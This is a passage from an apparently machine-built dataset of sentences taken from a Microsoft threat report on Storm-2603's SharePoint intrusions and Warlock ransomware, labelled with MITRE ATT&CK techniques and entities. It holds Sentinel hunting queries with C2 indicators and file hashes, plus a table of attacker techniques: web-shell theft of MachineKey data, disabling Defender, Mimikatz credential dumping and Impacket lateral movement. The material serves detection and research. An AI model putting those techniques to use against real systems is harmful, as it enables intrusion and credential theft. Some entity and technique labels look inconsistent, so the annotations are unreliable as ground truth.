"92_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "Several hunting queries are also available below:\nWeb shell detection Possible Webshell drop Malicious web application requests linked with Microsoft Defender for Endpoint alerts Web shell activity Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first-party and third-party data sources.", "sentence_text": "ASIM also supports deploying parsers to specific workspaces from GitHub , using an ARM template or manually.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s82-51c2db", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "ASIM also supports deploying parsers to specific workspaces from GitHub , using an ARM template or manually.", "sentence_text": "Detect network indicators of compromise and file hashes using ASIM //IP list and domain list- _Im_NetworkSession", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s83-c08129", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "Detect network indicators of compromise and file hashes using ASIM //IP list and domain list- _Im_NetworkSession", "sentence_text": "let lookback = 30d;\nlet ioc_ip_addr = dynamic([\"131.226.2.6\", \"134.199.202.205\", \"104.238.159.149\", \"188.130.206.168\"]);\nlet ioc_domains = dynamic([\"c34718cbb4c6.ngrok-free.app\"]);\n_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "None", "entities": [ { "text": "131.226.2.6", "start": 48, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "134.199.202.205", "start": 63, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "104.238.159.149", "start": 82, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "188.130.206.168", "start": 101, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "c34718cbb4c6.ngrok-free.app", "start": 149, "end": 176, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s84-d9b816", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "let lookback = 30d;\nlet ioc_ip_addr = dynamic([\"131.226.2.6\", \"134.199.202.205\", \"104.238.159.149\", \"188.130.206.168\"]);\nlet ioc_domains = dynamic([\"c34718cbb4c6.ngrok-free.app\"]);\n_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())", "sentence_text": "| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)\n| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor //IP list - _Im_WebSession let lookback = 30d;\nlet ioc_ip_addr = dynamic([\"131.226.2.6\", \"134.199.202.205\", \"104.238.159.149\", \"188.130.206.168\"]);\nlet ioc_sha_hashes =dynamic([\"92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514\"]);\n_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Hunting for Web Session data matching specific C2 IPs and file hashes", "entities": [ { "text": "131.226.2.6", "start": 311, "end": 322, "label": "Infrastructure_Indicator" }, { "text": "134.199.202.205", "start": 326, "end": 341, "label": "Infrastructure_Indicator" }, { "text": "104.238.159.149", "start": 345, "end": 360, "label": "Infrastructure_Indicator" }, { "text": "188.130.206.168", "start": 364, "end": 379, "label": "Infrastructure_Indicator" }, { "text": "92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514", "start": 414, "end": 478, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s85-70d37d", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)\n| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor //IP list - _Im_WebSession let lookback = 30d;\nlet ioc_ip_addr = dynamic([\"131.226.2.6\", \"134.199.202.205\", \"104.238.159.149\", \"188.130.206.168\"]);\nlet ioc_sha_hashes =dynamic([\"92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514\"]);\n_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())", "sentence_text": "| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)\n| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor // file hash list - imFileEvent let ioc_sha_hashes = dynamic([\"92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514\"]);\nimFileEvent\n| where SrcFileSHA256 in (ioc_sha_hashes) or TargetFileSHA256 in (ioc_sha_hashes)\n| extend AccountName = tostring(split(User, @'')[1]), AccountNTDomain = tostring(split(User, @'')[0])\n| extend AlgorithmType", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "None", "entities": [ { "text": "92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514", "start": 290, "end": 354, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s86-295e3d", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)\n| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor // file hash list - imFileEvent let ioc_sha_hashes = dynamic([\"92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514\"]);\nimFileEvent\n| where SrcFileSHA256 in (ioc_sha_hashes) or TargetFileSHA256 in (ioc_sha_hashes)\n| extend AccountName = tostring(split(User, @'')[1]), AccountNTDomain = tostring(split(User, @'')[0])\n| extend AlgorithmType", "sentence_text": "= \"SHA256\" Post exploitation C2 or file hashes Find devices that may have communicated with Storm-2603 post exploitation C2 or contain known Storm-2603 file hashes.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "communicated with Storm-2603 post exploitation C2 or contain known Storm-2603 file hashes", "entities": [ { "text": "Storm-2603", "start": 92, "end": 102, "label": "ThreatActor" }, { "text": "Post exploitation C2", "start": 11, "end": 31, "label": "MalwareTool" }, { "text": "SHA256", "start": 3, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "file hashes", "start": 35, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "Find devices", "start": 47, "end": 59, "label": "Action" }, { "text": "communicated with", "start": 74, "end": 91, "label": "Action" }, { "text": "contain", "start": 127, "end": 134, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s88-2b8d6c", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "//IP", "sentence_text": "list - _Im_WebSession let lookback = 30d;\nlet ioc_ip_addr = dynamic([\"65.38.121.198\"]);\nlet ioc_sha_hashes =dynamic([\"92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514\", \"24480dbe306597da1ba393b6e30d542673066f98826cc07ac4b9033137f37dbf\", \"b5a78616f709859a0d9f830d28ff2f9dbbb2387df1753739407917e96dadf6b0\", \"c27b725ff66fdfb11dd6487a3815d1d1eba89d61b0e919e4d06ed3ac6a74fe94\", \"1eb914c09c873f0a7bcf81475ab0f6bdfaccc6b63bf7e5f2dbf19295106af192\", \"4c1750a14915bf2c0b093c2cb59063912dfa039a2adfe6d26d6914804e2ae928\", \"83705c75731e1d590b08f9357bc3b0f04741e92a033618736387512b40dab060\", \"f54ae00a9bae73da001c4d3d690d26ddf5e8e006b5562f936df472ec5e299441\", \"b180ab0a5845ed619939154f67526d2b04d28713fcc1904fbd666275538f431d\", \"6753b840cec65dfba0d7d326ec768bff2495784c60db6a139f51c5e83349ac4d\", \"7ae971e40528d364fa52f3bb5e0660ac25ef63e082e3bbd54f153e27b31eae68\", \"567cb8e8c8bd0d909870c656b292b57bcb24eb55a8582b884e0a228e298e7443\", \"445a37279d3a229ed18513e85f0c8d861c6f560e0f914a5869df14a74b679b86\", \"ffbc9dfc284b147e07a430fe9471e66c716a84a1f18976474a54bee82605fa9a\", \"6b273c2179518dacb1218201fd37ee2492a5e1713be907e69bf7ea56ceca53a5\", \"c2c1fec7856e8d49f5d49267e69993837575dbbec99cd702c5be134a85b2c139\"]);\n_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())\n| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)\n| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor Storm-2603 C2 communication Look for devices that may have communicated with Storm-2603 C2 infrastructure as part of this activity.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Hunting for web session data matching specific Storm-2603 C2 IPs and a large list of file hashes", "entities": [ { "text": "Storm-2603", "start": 1578, "end": 1588, "label": "ThreatActor" }, { "text": "65.38.121.198", "start": 70, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514", "start": 118, "end": 182, "label": "Infrastructure_Indicator" }, { "text": "24480dbe306597da1ba393b6e30d542673066f98826cc07ac4b9033137f37dbf", "start": 186, "end": 250, "label": "Infrastructure_Indicator" }, { "text": "b5a78616f709859a0d9f830d28ff2f9dbbb2387df1753739407917e96dadf6b0", "start": 254, "end": 318, "label": "Infrastructure_Indicator" }, { "text": "c27b725ff66fdfb11dd6487a3815d1d1eba89d61b0e919e4d06ed3ac6a74fe94", "start": 322, "end": 386, "label": "Infrastructure_Indicator" }, { "text": "1eb914c09c873f0a7bcf81475ab0f6bdfaccc6b63bf7e5f2dbf19295106af192", "start": 390, "end": 454, "label": "Infrastructure_Indicator" }, { "text": "4c1750a14915bf2c0b093c2cb59063912dfa039a2adfe6d26d6914804e2ae928", "start": 458, "end": 522, "label": "Infrastructure_Indicator" }, { "text": "83705c75731e1d590b08f9357bc3b0f04741e92a033618736387512b40dab060", "start": 526, "end": 590, "label": "Infrastructure_Indicator" }, { "text": "f54ae00a9bae73da001c4d3d690d26ddf5e8e006b5562f936df472ec5e299441", "start": 594, "end": 658, "label": "Infrastructure_Indicator" }, { "text": "b180ab0a5845ed619939154f67526d2b04d28713fcc1904fbd666275538f431d", "start": 662, "end": 726, "label": "Infrastructure_Indicator" }, { "text": "6753b840cec65dfba0d7d326ec768bff2495784c60db6a139f51c5e83349ac4d", "start": 730, "end": 794, "label": "Infrastructure_Indicator" }, { "text": "7ae971e40528d364fa52f3bb5e0660ac25ef63e082e3bbd54f153e27b31eae68", "start": 798, "end": 862, "label": "Infrastructure_Indicator" }, { "text": "567cb8e8c8bd0d909870c656b292b57bcb24eb55a8582b884e0a228e298e7443", "start": 866, "end": 930, "label": "Infrastructure_Indicator" }, { "text": "445a37279d3a229ed18513e85f0c8d861c6f560e0f914a5869df14a74b679b86", "start": 934, "end": 998, "label": "Infrastructure_Indicator" }, { "text": "ffbc9dfc284b147e07a430fe9471e66c716a84a1f18976474a54bee82605fa9a", "start": 1002, "end": 1066, "label": "Infrastructure_Indicator" }, { "text": "6b273c2179518dacb1218201fd37ee2492a5e1713be907e69bf7ea56ceca53a5", "start": 1070, "end": 1134, "label": "Infrastructure_Indicator" }, { "text": "c2c1fec7856e8d49f5d49267e69993837575dbbec99cd702c5be134a85b2c139", "start": 1138, "end": 1202, "label": "Infrastructure_Indicator" }, { "text": "Look for devices", "start": 1529, "end": 1545, "label": "Action" }, { "text": "communicated with", "start": 1560, "end": 1577, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s90-6b61dc", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "//IP", "sentence_text": "list and domain list- _", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s91-a58eba", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "list and domain list- _", "sentence_text": "Im_NetworkSession let lookback = 30d;\nlet ioc_ip_addr = dynamic([\"65.38.121.198\"]);\nlet ioc_domains = dynamic([\"update.updatemicfosoft.com\"]);\n_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())\n| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)\n| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:\nVulnerability impact assessment Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Hunting for network sessions matching specific Storm-2603 C2 IPs and domains", "entities": [ { "text": "65.38.121.198", "start": 66, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "update.updatemicfosoft.com", "start": 112, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s92-a6ea05", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "Im_NetworkSession let lookback = 30d;\nlet ioc_ip_addr = dynamic([\"65.38.121.198\"]);\nlet ioc_domains = dynamic([\"update.updatemicfosoft.com\"]);\n_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())\n| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)\n| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:\nVulnerability impact assessment Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.", "sentence_text": "Threat intelligence reports CVE-2025-53770 – Microsoft SharePoint server remote code execution vulnerability Storm-2603 exploiting on-premises SharePoint vulnerabilities to distribute Warlock ransomware in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Storm-2603 exploiting SharePoint RCE to distribute Warlock ransomware", "entities": [ { "text": "Storm-2603", "start": 109, "end": 119, "label": "ThreatActor" }, { "text": "Warlock ransomware", "start": 184, "end": 202, "label": "MalwareTool" }, { "text": "exploiting", "start": 120, "end": 130, "label": "Action" }, { "text": "distribute", "start": 173, "end": 183, "label": "Action" }, { "text": "CVE-2025-53770", "start": 28, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "Microsoft SharePoint server", "start": 45, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "on-premises SharePoint vulnerabilities", "start": 131, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Defender Threat Intelligence", "start": 206, "end": 244, "label": "Infrastructure_Indicator" }, { "text": "Security Copilot", "start": 260, "end": 276, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Defender portal", "start": 332, "end": 357, "label": "Infrastructure_Indicator" }, { "text": "reports", "start": 20, "end": 27, "label": "Action" }, { "text": "get more information about this threat actor", "start": 361, "end": 405, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s93-db9cc8", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "Threat intelligence reports CVE-2025-53770 – Microsoft SharePoint server remote code execution vulnerability Storm-2603 exploiting on-premises SharePoint vulnerabilities to distribute Warlock ransomware in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.", "sentence_text": "MITRE ATT&CK techniques observed Threat actors have exhibited use of the following attack techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s94-d8fd9b", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "MITRE ATT&CK techniques observed Threat actors have exhibited use of the following attack techniques.", "sentence_text": "For standard industry documentation about these techniques, refer to the MITRE ATT&CK framework Initial Access T1190 Exploit public-facing application | Use of known vulnerabilities to exploit internet-facing on-premises SharePoint severs", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit public-facing application (SharePoint)", "entities": [ { "text": "T1190 Exploit public-facing application", "start": 111, "end": 150, "label": "Action" }, { "text": "internet-facing on-premises SharePoint severs", "start": 193, "end": 238, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s95-c8ffdb", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "For standard industry documentation about these techniques, refer to the MITRE ATT&CK framework Initial Access T1190 Exploit public-facing application | Use of known vulnerabilities to exploit internet-facing on-premises SharePoint severs", "sentence_text": "Discovery T1033 System Owner/User Discovery | Whoami commands run after initial access and privilege escalation Execution T1059.001 Command and scripting interpreter:", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1033", "name": "System Owner/User Discovery" } ], "procedure": "run whoami for discovery; use command interpreter", "entities": [ { "text": "T1033 System Owner/User Discovery", "start": 10, "end": 43, "label": "Action" }, { "text": "T1059.001 Command and scripting interpreter", "start": 122, "end": 165, "label": "Action" }, { "text": "Whoami", "start": 46, "end": 52, "label": "MalwareTool" } ] }, { "uid": "mitre-92_mitre_report-p1-s96-a7ccf3", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "Discovery T1033 System Owner/User Discovery | Whoami commands run after initial access and privilege escalation Execution T1059.001 Command and scripting interpreter:", "sentence_text": "PowerShell | Use of a web shell to run PowerShell to read and transmit MachineKey data to attacker T1059.003 Command and Scripting Interpreter: Windows Command Shell | Use of batch scripts and cmd.exe to execute PsExec T1569.002 System Services: Service Execution | Windows service control manager is abused to disable Microsoft Defender protections through registry modifications and launch PsExec T1543.003 Create or Modify System Process: Windows Service | PsExec is leveraged Windows services to escalate privileges from administrator to SYSTEM with the -s argument", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" }, { "id": "T1059.003", "name": "Windows Command Shell" }, { "id": "T1569.002", "name": "Service Execution" }, { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "use cmd/batch scripts; abuse services to disable Defender and run PsExec; leverage PsExec for privilege escalation", "entities": [ { "text": "T1059.003 Command and Scripting Interpreter: Windows Command Shell ", "start": 99, "end": 166, "label": "Action" }, { "text": "T1569.002 System Services: Service Execution", "start": 219, "end": 263, "label": "Action" }, { "text": "T1543.003 Create or Modify System Process: Windows Service", "start": 399, "end": 457, "label": "Action" }, { "text": "attacker", "start": 90, "end": 98, "label": "ThreatActor" }, { "text": "PsExec", "start": 212, "end": 218, "label": "MalwareTool" }, { "text": "cmd.exe", "start": 193, "end": 200, "label": "MalwareTool" }, { "text": "MachineKey data", "start": 71, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "Windows service control manager", "start": 266, "end": 297, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Defender protections", "start": 319, "end": 349, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s97-8bc154", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "PowerShell | Use of a web shell to run PowerShell to read and transmit MachineKey data to attacker T1059.003 Command and Scripting Interpreter: Windows Command Shell | Use of batch scripts and cmd.exe to execute PsExec T1569.002 System Services: Service Execution | Windows service control manager is abused to disable Microsoft Defender protections through registry modifications and launch PsExec T1543.003 Create or Modify System Process: Windows Service | PsExec is leveraged Windows services to escalate privileges from administrator to SYSTEM with the -s argument", "sentence_text": "T1047 Windows Management Instrumentation | Impacket is used to execute commands through WMI Persistence T1505.003 Server software component: web shell | Threat actors install web shell after exploiting SharePoint vulnerability T1505.004 Server Software Component: IIS Components | IIS worker process is loaded suspicious .NET assembly T1053.005 Scheduled Task/Job: Scheduled Task | Scheduled task is created to maintain persistence following initial access Privilege Escalation T1484.001 Domain or Tenant Policy Modification: Group Policy Modification | GPO modification deployed batch scripts for ransomware deployment Defense Evasion T1620", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" }, { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1505.004", "name": "IIS Components" }, { "id": "T1053.005", "name": "Scheduled Task" }, { "id": "T1484.001", "name": "Group Policy Modification" } ], "procedure": "Use Impacket/WMI for execution; install web shell; load malicious .NET assembly in IIS; create scheduled task; modify GPO to deploy ransomware scripts.", "entities": [ { "text": "Threat actors", "start": 153, "end": 166, "label": "ThreatActor" }, { "text": "Impacket", "start": 43, "end": 51, "label": "MalwareTool" }, { "text": "suspicious .NET assembly", "start": 310, "end": 334, "label": "MalwareTool" }, { "text": "batch scripts", "start": 580, "end": 593, "label": "MalwareTool" }, { "text": "IIS worker process", "start": 281, "end": 299, "label": "Infrastructure_Indicator" }, { "text": "Scheduled Task", "start": 365, "end": 379, "label": "Infrastructure_Indicator" }, { "text": "execute commands through WMI", "start": 63, "end": 91, "label": "Action" }, { "text": "install web shell", "start": 167, "end": 184, "label": "Action" }, { "text": "GPO modification deployed", "start": 554, "end": 579, "label": "Action" }, { "text": "ransomware deployment", "start": 598, "end": 619, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s98-c936f0", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "T1047 Windows Management Instrumentation | Impacket is used to execute commands through WMI Persistence T1505.003 Server software component: web shell | Threat actors install web shell after exploiting SharePoint vulnerability T1505.004 Server Software Component: IIS Components | IIS worker process is loaded suspicious .NET assembly T1053.005 Scheduled Task/Job: Scheduled Task | Scheduled task is created to maintain persistence following initial access Privilege Escalation T1484.001 Domain or Tenant Policy Modification: Group Policy Modification | GPO modification deployed batch scripts for ransomware deployment Defense Evasion T1620", "sentence_text": "Disabling Microsoft Defender via registry modifications Credential Access T1003.001 OS Credential Dumping: LSASS Memory | Mimikatz is used to run module sekurlsa::logonpasswords , which lists all available credentials Lateral Movement T1570 Lateral Tool Transfer | Impacket is observed leveraging Windows Management Instrumentation to remotely stage and execute payloads Collection T1119", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" }, { "id": "T1003.001", "name": "LSASS Memory" }, { "id": "T1021.002", "name": "SMB/Windows Admin Shares" }, { "id": "T1119", "name": "Automated Collection" } ], "procedure": "Disable Defender via registry; dump credentials with Mimikatz; use Impacket/WMI for lateral movement and payload staging.", "entities": [ { "text": "Mimikatz", "start": 122, "end": 130, "label": "MalwareTool" }, { "text": "Impacket", "start": 265, "end": 273, "label": "MalwareTool" }, { "text": "sekurlsa::logonpasswords", "start": 153, "end": 177, "label": "MalwareTool" }, { "text": "Windows Management Instrumentation", "start": 297, "end": 331, "label": "Infrastructure_Indicator" }, { "text": "Disabling Microsoft Defender", "start": 0, "end": 28, "label": "Action" }, { "text": "registry modifications", "start": 33, "end": 55, "label": "Action" }, { "text": "OS Credential Dumping", "start": 84, "end": 105, "label": "Action" }, { "text": "LSASS Memory", "start": 107, "end": 119, "label": "Action" }, { "text": "Lateral Movement", "start": 218, "end": 234, "label": "Action" }, { "text": "Lateral Tool Transfer", "start": 241, "end": 262, "label": "Action" }, { "text": "Collection", "start": 371, "end": 381, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s99-c95077", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "Disabling Microsoft Defender via registry modifications Credential Access T1003.001 OS Credential Dumping: LSASS Memory | Mimikatz is used to run module sekurlsa::logonpasswords , which lists all available credentials Lateral Movement T1570 Lateral Tool Transfer | Impacket is observed leveraging Windows Management Instrumentation to remotely stage and execute payloads Collection T1119", "sentence_text": "Automated collection | Use of web shell to display MachineKey data T1005 Data from Local System | Host and local system information gathered by adversary during attack Command and Control T1090 Proxy, Technique | Fast reverse proxy tool used for C2 communications Impact T1486 Data Encrypted for Impact | Files are encrypted in victim environments as part of ransomware attack References CVE-2025-53770 (MSRC)\nCVE-2025-49704\n(MSRC\nCVE-2025-49706\n(MSRC\nCVE-2025-53771\n(MSRC)\nLearn more\nMeet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025 .", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1119", "name": "Automated Collection" }, { "id": "T1005", "name": "Data from Local System" }, { "id": "T1090", "name": "Proxy" }, { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Use web shell to collect MachineKey data; gather local system info; use reverse proxy for C2; encrypt files for ransomware impact.", "entities": [ { "text": "web shell", "start": 30, "end": 39, "label": "MalwareTool" }, { "text": "Fast reverse proxy tool", "start": 213, "end": 236, "label": "MalwareTool" }, { "text": "MachineKey data", "start": 51, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "CVE-2025-53770", "start": 388, "end": 402, "label": "Infrastructure_Indicator" }, { "text": "CVE-2025-49704", "start": 410, "end": 424, "label": "Infrastructure_Indicator" }, { "text": "CVE-2025-49706", "start": 431, "end": 445, "label": "Infrastructure_Indicator" }, { "text": "CVE-2025-53771", "start": 452, "end": 466, "label": "Infrastructure_Indicator" }, { "text": "Automated collection", "start": 0, "end": 20, "label": "Action" }, { "text": "Data from Local System", "start": 73, "end": 95, "label": "Action" }, { "text": "Command and Control", "start": 168, "end": 187, "label": "Action" }, { "text": "Proxy", "start": 194, "end": 199, "label": "Action" }, { "text": "Technique", "start": 201, "end": 210, "label": "Action" }, { "text": "Data Encrypted for Impact", "start": 277, "end": 302, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s100-36bc2c", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "Automated collection | Use of web shell to display MachineKey data T1005 Data from Local System | Host and local system information gathered by adversary during attack Command and Control T1090 Proxy, Technique | Fast reverse proxy tool used for C2 communications Impact T1486 Data Encrypted for Impact | Files are encrypted in victim environments as part of ransomware attack References CVE-2025-53770 (MSRC)\nCVE-2025-49704\n(MSRC\nCVE-2025-49706\n(MSRC\nCVE-2025-53771\n(MSRC)\nLearn more\nMeet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025 .", "sentence_text": "Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s101-2920af", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 101, "context_before": "Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.", "sentence_text": "November 3\n10 min read SesameOp: Novel backdoor uses OpenAI Assistants API for command and control Get started with Microsoft Security Protect your people, data, and infrastructure with AI-powered, end-to-end security from Microsoft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s102-d4a144", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 102, "context_before": "November 3\n10 min read SesameOp: Novel backdoor uses OpenAI Assistants API for command and control Get started with Microsoft Security Protect your people, data, and infrastructure with AI-powered, end-to-end security from Microsoft.", "sentence_text": "Learn how\nConnect with us on social YouTube LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s1-622e73", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Written by: Lukasz Lamparski, Punsaen Boonyakarn, Shawn Chew, 